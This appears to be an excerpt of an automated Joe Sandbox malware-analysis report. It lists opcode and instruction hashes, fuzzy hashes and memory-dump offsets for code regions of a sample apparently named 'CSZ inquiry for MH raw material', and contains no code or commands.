                                                                        • Instruction ID: c4fbe9ce07e284d07f2c7a5aa9b9efe0d7ffad1817d7bde41b0bfa8ce8cd1c57
                                                                        • Opcode Fuzzy Hash: a9ec53c0489ebcf3790f2c93648d2ed775a0404cb18b063b9851968d7b4c8e23
                                                                        • Instruction Fuzzy Hash: F2110632240614EFCB22DB59CD40F9A77A8EF95B66F514425FA05EB261DA70ED08C7A0
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2174231836.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D90000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_d90000_CSZ inquiry for MH raw material.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: e4de620cf9589192dc5cd759b8335e828a516e1c77e0ce7254bfa30ef53ea17c
                                                                        • Instruction ID: 8fe5ca9a07c266d5d6a50329e88e59c12f9775cfd51f1205f8f8b206e5b4b1ef
                                                                        • Opcode Fuzzy Hash: e4de620cf9589192dc5cd759b8335e828a516e1c77e0ce7254bfa30ef53ea17c
                                                                        • Instruction Fuzzy Hash: B6110872A00208EFCB24DF59C580A26B7F4DF94704B16817ADA059BB10D634DD00CBB0
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2174231836.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D90000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_d90000_CSZ inquiry for MH raw material.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 4aa21802b203594a0c183a0f29eab8f59a86752156d6c183eb3a1b7e63dba1b2
                                                                        • Instruction ID: e895c41c7abd3760af7ced6e99a2306d08190347d955a9ae11adf28e9436f23f
                                                                        • Opcode Fuzzy Hash: 4aa21802b203594a0c183a0f29eab8f59a86752156d6c183eb3a1b7e63dba1b2
                                                                        • Instruction Fuzzy Hash: 8111C432A00915AFDB19DB54CC05F9DF7F6EF84310F09826AEC59A7341E671AE51CB90
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2174231836.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D90000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_d90000_CSZ inquiry for MH raw material.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 975f93ae0bdd36ad56dc7d48bb40b3373a7fecd11d003270eb178f636a7ee754
                                                                        • Instruction ID: e5a5712a536d927620ff27dc2f106dc42096c9f694a9ad076fba511ebf7c00d8
                                                                        • Opcode Fuzzy Hash: 975f93ae0bdd36ad56dc7d48bb40b3373a7fecd11d003270eb178f636a7ee754
                                                                        • Instruction Fuzzy Hash: C72106B5A00B059FD3A0CF29D441B52BBF4FB48B10F10492EE88AC7B41E371E854CBA0
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2174231836.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D90000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_d90000_CSZ inquiry for MH raw material.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: be7cdff5b472ac4535dea4ef4a70d93a0a3acfb449cd7ab0a5074af29ebfca6c
                                                                        • Instruction ID: 454a22871a9fd30f39238ac5feaaeb4d80e88f4f154d412fb1de6e3622c7c77e
                                                                        • Opcode Fuzzy Hash: be7cdff5b472ac4535dea4ef4a70d93a0a3acfb449cd7ab0a5074af29ebfca6c
                                                                        • Instruction Fuzzy Hash: 94119E32600600EFDF289F54E845B56B7E5FF89758F199428F909AB361DB31DD40DBA0
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2174231836.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D90000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_d90000_CSZ inquiry for MH raw material.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 561d54572c42f5e5bc8528649c4db58698dfc3adbad6e6d8085633926f1097fd
                                                                        • Instruction ID: 4f786bfe527cd7768efd4358ceea918d408a70c6b94375c5ec1adcf588205c0b
                                                                        • Opcode Fuzzy Hash: 561d54572c42f5e5bc8528649c4db58698dfc3adbad6e6d8085633926f1097fd
                                                                        • Instruction Fuzzy Hash: 1F012632305688ABE326A36AEC85F77779DEF80358F190075F941AB641D924DC00C272
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2174231836.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D90000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_d90000_CSZ inquiry for MH raw material.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: c448cc3ce899a46aed8f39d06c12c7dd4a96bd4bc13ed85c84e915895cbf3137
                                                                        • Instruction ID: 8df2e3f53de35b1f2a9050e920c3ac94e208b4a67fd1fc1b5ef31369310d32bd
                                                                        • Opcode Fuzzy Hash: c448cc3ce899a46aed8f39d06c12c7dd4a96bd4bc13ed85c84e915895cbf3137
                                                                        • Instruction Fuzzy Hash: BA11ED36240646AFCB25CF59D991F567BA8EB86B64F18421EF8088B290C770EC40CFB0
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2174231836.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D90000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_d90000_CSZ inquiry for MH raw material.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: a01fef54a85869612d7fdb0531dd6c2bf1b24d3f22506e201f17be6022abc729
                                                                        • Instruction ID: f5324c28d08e104ce12df1b576b0dacd045fa52db524025d8606ce9157aeb9d3
                                                                        • Opcode Fuzzy Hash: a01fef54a85869612d7fdb0531dd6c2bf1b24d3f22506e201f17be6022abc729
                                                                        • Instruction Fuzzy Hash: CD11C276200A119FCB219A29D840F67B7A6FFC4724F195529E942977D0EA30EC03CBA0
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2174231836.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D90000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_d90000_CSZ inquiry for MH raw material.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: ba7967d919c7a6d3651ee76f1599af65991b80ec12a7f768f208fbe5bfed196f
                                                                        • Instruction ID: 40350f80cedc2bd0b7f8fb69c51af35d8dfa6d4c4b55876a505e6ea4d63bd45d
                                                                        • Opcode Fuzzy Hash: ba7967d919c7a6d3651ee76f1599af65991b80ec12a7f768f208fbe5bfed196f
                                                                        • Instruction Fuzzy Hash: 2311C272900719ABCB22DF59D981B6EF7B8EF84740F564099EA00B7601DB34ED418B70
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2174231836.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D90000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_d90000_CSZ inquiry for MH raw material.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 4cf7621214355d62b30e89f34b874ad987163a76f09d128caa661698fb179c38
                                                                        • Instruction ID: 5ff8d0bf093f90e44132ecae82d82c773f5a1fdffe35c697099b151262756b7f
                                                                        • Opcode Fuzzy Hash: 4cf7621214355d62b30e89f34b874ad987163a76f09d128caa661698fb179c38
                                                                        • Instruction Fuzzy Hash: 3801D2725002459FC315EB1AD809F57BBFAEB81314F24827EE0049B271C770AC45CBB4
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2174231836.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D90000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_d90000_CSZ inquiry for MH raw material.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 3cef38ccb94af525019048e13b43edf7cf1492b2ee9bf366ac8f969377c4ca22
                                                                        • Instruction ID: 111745642cc1b78a8904d1b8ab4b731ae538585715e70f811230de8b38d99411
                                                                        • Opcode Fuzzy Hash: 3cef38ccb94af525019048e13b43edf7cf1492b2ee9bf366ac8f969377c4ca22
                                                                        • Instruction Fuzzy Hash: A11104722056D19FD722A769E954B2537E4EB4074CF2910B1ED41AB782E728CC82C671
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2174231836.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D90000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_d90000_CSZ inquiry for MH raw material.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 9e027ce95eb4732775abeceb8693466c215af0eeeb981fbb7873360829093128
                                                                        • Instruction ID: 1371d961d8848fa6766facfdcb614ad52399ea1d5753cd79c51442bdf1afb9ee
                                                                        • Opcode Fuzzy Hash: 9e027ce95eb4732775abeceb8693466c215af0eeeb981fbb7873360829093128
                                                                        • Instruction Fuzzy Hash: AB01F532600105EFD7219F54EC0AF5ABBA9FF80764F159066F905AB360E771DD40D7A0
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2174231836.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D90000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_d90000_CSZ inquiry for MH raw material.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 3c789e6569c780a36f7740ae573b44e677a8d28900b05b280d318a59104278c5
                                                                        • Instruction ID: 5f5c55a88d0cd071553f39f54dda5fe901462c4f5be04baff357720202b42109
                                                                        • Opcode Fuzzy Hash: 3c789e6569c780a36f7740ae573b44e677a8d28900b05b280d318a59104278c5
                                                                        • Instruction Fuzzy Hash: 0A012631404B11DBCB308F19D840AB27BE4EF55760B04852DFC968B280DB31D800CBB5
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2174231836.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D90000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_d90000_CSZ inquiry for MH raw material.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 692e895c70f6a3d7682a183625fb7db787d10db8df332529d235019a25a8fe78
                                                                        • Instruction ID: 77815802355c88aa31de693aef6af5ec70f1a52ebb28519cf45571e1a05d1b42
                                                                        • Opcode Fuzzy Hash: 692e895c70f6a3d7682a183625fb7db787d10db8df332529d235019a25a8fe78
                                                                        • Instruction Fuzzy Hash: 520126B24411029FCB31DF18DC00E57B7A8EBD1374B255215E968AB2E2D730DC02C7E0
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2174231836.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D90000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_d90000_CSZ inquiry for MH raw material.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 47201a25174eba5c5cec399f04d1cd28892d84ac8f44cbd17f5d80dfef03fe6e
                                                                        • Instruction ID: e2500775d771b2a296397990443d64853c50310db318305fc4f66a48c5fb952a
                                                                        • Opcode Fuzzy Hash: 47201a25174eba5c5cec399f04d1cd28892d84ac8f44cbd17f5d80dfef03fe6e
                                                                        • Instruction Fuzzy Hash: F3115E31241640EFCB15AF19CD91F567BB8FF44B54F240065F905AB6A2C675ED01CAA0
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2174231836.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D90000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_d90000_CSZ inquiry for MH raw material.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: f8a08504ad48ea8aa8eb850f323cd7eb31d87a601df8c99a839c8a4b1e8b8fda
                                                                        • Instruction ID: e85098f771f0d3d0cebabf55bc3ca97878abb729e11e8e1f6ebeb59866df4f56
                                                                        • Opcode Fuzzy Hash: f8a08504ad48ea8aa8eb850f323cd7eb31d87a601df8c99a839c8a4b1e8b8fda
                                                                        • Instruction Fuzzy Hash: 2C117C71942228ABDB25EB64CD46FE9B3B4EF04710F5041D8B318B61E1DB709E81CF94
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2174231836.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D90000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_d90000_CSZ inquiry for MH raw material.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: cec1b93156338fd1fb8a58b034706470ae4e768dca4fd24834b6fe138f7a55f1
                                                                        • Instruction ID: da6666f93d753006899ac97b77750a350db4ca5a142a7a0e18891b40f852f9d8
                                                                        • Opcode Fuzzy Hash: cec1b93156338fd1fb8a58b034706470ae4e768dca4fd24834b6fe138f7a55f1
                                                                        • Instruction Fuzzy Hash: 08012432200111CBDF109A29D880FA2B766FFC4704F2950AAEC458F246DA71CC81E7F0
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2174231836.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D90000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_d90000_CSZ inquiry for MH raw material.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 3c8e8f7c2d9261e6c04f5474725e94107b55f271d3b693c94710c4845be54907
                                                                        • Instruction ID: ea44e84b29bdb8b8af3923892386ac6ba2f6b47c59ce4c4b217f047e2885ee63
                                                                        • Opcode Fuzzy Hash: 3c8e8f7c2d9261e6c04f5474725e94107b55f271d3b693c94710c4845be54907
                                                                        • Instruction Fuzzy Hash: B2111773900019ABCB15DB94DC81EEFBBBCEF48358F044166A906A7211EA34EA54CBE1
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2174231836.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D90000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_d90000_CSZ inquiry for MH raw material.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 3066fb58fbeadef7bbe6db32de3aea538233e7c59d7a5e98c679ab77080acab7
                                                                        • Instruction ID: 4b4c86f3366dd59d5c3da9ba4fe0a836848ac5013c26b1745ab103abae33ec9c
                                                                        • Opcode Fuzzy Hash: 3066fb58fbeadef7bbe6db32de3aea538233e7c59d7a5e98c679ab77080acab7
                                                                        • Instruction Fuzzy Hash: A211C4326841469FC701CF69D800BA6B7B9FB5A315F588959EC48DF315E732EC89CBA0
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2174231836.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D90000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_d90000_CSZ inquiry for MH raw material.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 4f4b7591b19d37783cf916e63ba8cd0655d72a5855c80c402861764c8e54ca91
                                                                        • Instruction ID: c685842b41c7683bf79f50711195962df1fef77680d37345bbd433db7f6bedb5
                                                                        • Opcode Fuzzy Hash: 4f4b7591b19d37783cf916e63ba8cd0655d72a5855c80c402861764c8e54ca91
                                                                        • Instruction Fuzzy Hash: 5A11E8B1E012099FCB04DFA9D581AAEB7F8EF48340F10406AB905F7351D674EE418BA4
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2174231836.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D90000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_d90000_CSZ inquiry for MH raw material.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: f2cca8c4c54a9b3e4f15cff4e34b52fc9fa70518fa1eb1484ba5b043ce3d45ee
                                                                        • Instruction ID: e032fbdd170bca41fceba295586cd51204dc7813760bd9f86237dc53ffca3c2f
                                                                        • Opcode Fuzzy Hash: f2cca8c4c54a9b3e4f15cff4e34b52fc9fa70518fa1eb1484ba5b043ce3d45ee
                                                                        • Instruction Fuzzy Hash: DA01B1391802109BC731AB65A842E77BBA9FFA17A4B14542FF5546B391CB30AC41CBE1
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2174231836.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D90000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_d90000_CSZ inquiry for MH raw material.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: b6e6bae370d141c278cca9ff7970758f8357b6fcd4eb9a88dce0b74b09aa1408
                                                                        • Instruction ID: 62e32fcbabad76e0ae3a168fc3d5b34de5bf04d349056f6b551a8cf0155a3805
                                                                        • Opcode Fuzzy Hash: b6e6bae370d141c278cca9ff7970758f8357b6fcd4eb9a88dce0b74b09aa1408
                                                                        • Instruction Fuzzy Hash: BB118071A0220CAFDB04DF64C855FAE7BF5EB44344F104059FA05A7290DB35AE51CB91
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2174231836.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D90000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_d90000_CSZ inquiry for MH raw material.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: dec391378cc995e4bcc1589e6a6118842a70016cea674f56f99eea4ad8bc76d4
                                                                        • Instruction ID: f58d406b4467837be674085077b2e05be83735547e5809488f0f91c71f4292ac
                                                                        • Opcode Fuzzy Hash: dec391378cc995e4bcc1589e6a6118842a70016cea674f56f99eea4ad8bc76d4
                                                                        • Instruction Fuzzy Hash: 9501D832200B45DFDB22A666C840FE777EEFFC4754F159419A5568B540DE70E942CB70
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2174231836.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D90000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_d90000_CSZ inquiry for MH raw material.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 99032bae798461c53387d8e395c561f258e5d948e18cf11137ea0f4bcff0af71
                                                                        • Instruction ID: 1c169df1b25cfcace965b37163fb065165818ddcb511d7e840e84c1f830dd3c1
                                                                        • Opcode Fuzzy Hash: 99032bae798461c53387d8e395c561f258e5d948e18cf11137ea0f4bcff0af71
                                                                        • Instruction Fuzzy Hash: C601A272201A44BFC311BB79CD86E67BBACFF947A4B000626B50893662DB64EC01C6F0
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2174231836.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D90000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_d90000_CSZ inquiry for MH raw material.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 063aa379c0424ba2e71c8e126af3d6b4fb32de97b4a149b9100452beafce1638
                                                                        • Instruction ID: ce5187a150d70b7fe68e4a053297fb45385a8bf879f57d4af5a341cf9d95eec3
                                                                        • Opcode Fuzzy Hash: 063aa379c0424ba2e71c8e126af3d6b4fb32de97b4a149b9100452beafce1638
                                                                        • Instruction Fuzzy Hash: 2F01D8322146019BC320DF7988899A7F7A8EB44765F614A29FD59A72C1E7309905C7E1
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2174231836.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D90000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_d90000_CSZ inquiry for MH raw material.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: acbc44ffc1f7f61163037daa4031dae4ba4fa99c8ca885d1df79ac90594711f7
                                                                        • Instruction ID: c81168e280a8fb3a759cdade8f81c948c3bfe47773d84de1a4b66f3ab5ee52a0
                                                                        • Opcode Fuzzy Hash: acbc44ffc1f7f61163037daa4031dae4ba4fa99c8ca885d1df79ac90594711f7
                                                                        • Instruction Fuzzy Hash: A9116D75A0120CEFDB05EFA4D951EAE7BB5EB48344F104059F911A7391DB34EE51CB90
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2174231836.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D90000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_d90000_CSZ inquiry for MH raw material.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 3966715c63618f97cab280d4bca290a0542ab9e5c2190f2a7ade6d18db59f853
                                                                        • Instruction ID: 6bbb5fd0fd0af908a55a3ef45148df24bf35dab0ffcb1fb7e7b2329804a3b3c4
                                                                        • Opcode Fuzzy Hash: 3966715c63618f97cab280d4bca290a0542ab9e5c2190f2a7ade6d18db59f853
                                                                        • Instruction Fuzzy Hash: A4115EB16153049FC700DF69D44295BBBE4EF98710F00851EFA98D7391D670E900CBA2
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2174231836.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D90000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_d90000_CSZ inquiry for MH raw material.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 4be238ecb871e70af7da4c9819feb513cc5cd9ee9a4f29187abed574232cbb68
                                                                        • Instruction ID: 2b8d382cc5ce4796b4de332606b68b3e091ae26667b2e05c2d6269a8c0259e8e
                                                                        • Opcode Fuzzy Hash: 4be238ecb871e70af7da4c9819feb513cc5cd9ee9a4f29187abed574232cbb68
                                                                        • Instruction Fuzzy Hash: 2E012473240A019FDF219A69C841F92B7EAFBC5304F045959F5428B690EAB0F882C7A0
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2174231836.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D90000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_d90000_CSZ inquiry for MH raw material.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 55ba6b239183cbc5533b86d4b98eba166d7eb8423843f7ebff8e239e19ea36f9
                                                                        • Instruction ID: 05d0b5e42c387fb53c4eb9eb1a1b040a12ff12f0caffff3455225fda087730f3
                                                                        • Opcode Fuzzy Hash: 55ba6b239183cbc5533b86d4b98eba166d7eb8423843f7ebff8e239e19ea36f9
                                                                        • Instruction Fuzzy Hash: 7D115BB16193089FC700DF69D441A5BBBE8EF89750F00851EF958E73A1E670E940CBA2
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2174231836.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D90000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_d90000_CSZ inquiry for MH raw material.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 0b4e63a3af2f36388c19bb01a8158bbf85eee50dbe01f6888877beb839016758
                                                                        • Instruction ID: ac3dc9af87c492989bc07cb90ff563c3952378f2b83168e1a49bd5adbd237f95
                                                                        • Opcode Fuzzy Hash: 0b4e63a3af2f36388c19bb01a8158bbf85eee50dbe01f6888877beb839016758
                                                                        • Instruction Fuzzy Hash: FA0156722006809BD326A61DC958F7677ECEB44B54F0D44A2F905DBAA2D6A8DC80C621
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2174231836.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D90000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_d90000_CSZ inquiry for MH raw material.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 92f0b4132d388f94010d2fb367356502580a1e219e99ac409b816ac382119ab7
                                                                        • Instruction ID: 458adcbc48d600e9561995d1a68763cfd76bcac5eecb55351b4c90d3eb1be7e7
                                                                        • Opcode Fuzzy Hash: 92f0b4132d388f94010d2fb367356502580a1e219e99ac409b816ac382119ab7
                                                                        • Instruction Fuzzy Hash: 1B01DF31600504EFCB04EB6AEC029EFB3EDEF80310B194069E902B7281DE70ED41D6A4
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2174231836.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D90000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_d90000_CSZ inquiry for MH raw material.jbxd
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: efef86555f92047e5225e54041e6cd5d4d4152b384df69da5080ddc46bf6271e
                                                                        • Instruction ID: 8ffa08c9964bf9038699711554946105a97d3fece17a243cd39c406f45cdae02
                                                                        • Opcode Fuzzy Hash: efef86555f92047e5225e54041e6cd5d4d4152b384df69da5080ddc46bf6271e
                                                                        • Instruction Fuzzy Hash: A501A2B1280710AFD3315B15E843F57BAA8DF55F90F11142BB645BF3D1DAB09940CBA4
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2174231836.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D90000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_d90000_CSZ inquiry for MH raw material.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: d581145c77e097dfaf3faa95eaac5ad8668a75e88deebeab4842dfa809067df6
                                                                        • Instruction ID: 529fa50043741adfc48a1c13a42d2b268fe3d31be3c9793c7f6e63b7772f5dd9
                                                                        • Opcode Fuzzy Hash: d581145c77e097dfaf3faa95eaac5ad8668a75e88deebeab4842dfa809067df6
                                                                        • Instruction Fuzzy Hash: 3AF0F432B41B61B7C731DB5A8D40F57BAA9EB84B90F144029B505A7641CA30ED01CAB0
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2174231836.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D90000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_d90000_CSZ inquiry for MH raw material.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 65a6da88ffe4e3ef4f4bf4dda68b508183db8c002971e90ba11f3763248cd9ea
                                                                        • Instruction ID: 634db387e8f128ce8b7325abebb1e81c344a26376c147ffee1ad73ca20b9f8a7
                                                                        • Opcode Fuzzy Hash: 65a6da88ffe4e3ef4f4bf4dda68b508183db8c002971e90ba11f3763248cd9ea
                                                                        • Instruction Fuzzy Hash: 14F0AFB2600A11ABD324DF4E9841E57F7EADBC0B80F088129E505D7261EA31DD05CBA0
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2174231836.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D90000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_d90000_CSZ inquiry for MH raw material.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 16b984d21a50bd76ce680db92ec7db6002d8e0eaf55f1631d0975c8c7ffe0d9a
